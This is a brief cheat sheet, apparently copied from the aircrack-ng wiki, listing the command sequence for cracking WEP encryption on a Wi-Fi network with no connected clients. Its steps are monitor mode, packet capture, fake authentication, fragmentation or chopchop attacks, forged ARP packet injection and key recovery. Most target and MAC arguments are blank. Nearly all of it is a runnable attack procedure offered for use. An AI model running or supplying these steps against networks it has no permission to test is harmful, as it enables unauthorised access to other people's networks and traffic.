## # Wifi WEP cracking cheat sheet. # # Original link: http://www.aircrack-ng.org/doku.php?id=how_to_crack_wep_with_no_clients ## # monitor mode airmon-ng start # capture airodump-ng -c 6 --bssid -w mon0 # fake auth aireplay-ng -1 0 -e -a -h mon0 # (picky access points) aireplay-ng -1 6000 -o 1 -q 10 -e -a -h mon0 ------------------------------------------------------------ # three options here # fragmentation attack aireplay-ng -5 -b -h mon0 # chopChop attack (if fragmentation fails) aireplay-ng -4 -h -b mon0 # use packetforge-ng to create an arp packet packetforge-ng -0 -a -h -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request # inject the arp packet: aireplay-ng -2 -r arp-request mon0 # ------------------------------------------------------------ # no clients aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b -h mon0 # (continue) aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b -h -r .cap mon0 # ------------------------------------------------------------ # crack: aircrack-ng .cap